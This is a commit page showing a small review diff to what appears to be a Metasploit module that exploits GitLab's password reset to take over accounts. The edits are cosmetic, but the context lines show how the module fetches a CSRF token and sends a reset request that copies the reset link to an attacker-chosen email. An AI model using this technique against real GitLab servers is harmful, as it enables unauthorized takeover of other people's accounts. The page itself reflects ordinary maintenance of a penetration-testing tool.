Skip to content

Commit e6c4195

Browse files
committed
gitlab password reset account takeoever review
1 parent 482d2b2 commit e6c4195

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -44,8 +44,8 @@ def initialize
4444
register_options(
4545
[
4646
Opt::RPORT(80),
47-
OptString.new('TARGETEMAIL', [ true, 'The email address to compromise', '' ]),
48-
OptString.new('MYEMAIL', [ true, 'An email address to also send the password reset email to', '' ]),
47+
OptString.new('TARGETEMAIL', [ true, 'The email address to compromise' ]),
48+
OptString.new('MYEMAIL', [ true, 'An email address to also send the password reset email to' ]),
4949
OptString.new('TARGETURI', [true, 'The path to GitLab', '/'])
5050
]
5151
)
@@ -59,7 +59,7 @@ def run_host(_ip)
5959
'uri' => normalize_uri(target_uri, 'users', 'sign_in')
6060
)
6161

62-
fail_with(Msf::Module::Failure::Unreachable, 'No response received') if res.nil?
62+
fail_with(Failure::Unreachable, 'No response received') if res.nil?
6363

6464
fail_with(Failure::UnexpectedReply, 'Unable to find CSRF token') unless res.body =~ %r{<meta name="csrf-token" content="([^"]+)" />}
6565
print_good("CSRF Token: #{::Regexp.last_match(1)}")
@@ -74,7 +74,7 @@ def run_host(_ip)
7474
"authenticity_token=#{::Regexp.last_match(1)}"
7575
].join('&')
7676
)
77-
fail_with(Msf::Module::Failure::Unreachable, 'No response received') if res.nil?
77+
fail_with(Failure::Unreachable, 'No response received') if res.nil?
7878

7979
if res.code == 302
8080
print_good("Sent, check #{datastore['MYEMAIL']} for a possible password reset link (failure is blind)")

0 commit comments

Comments
 (0)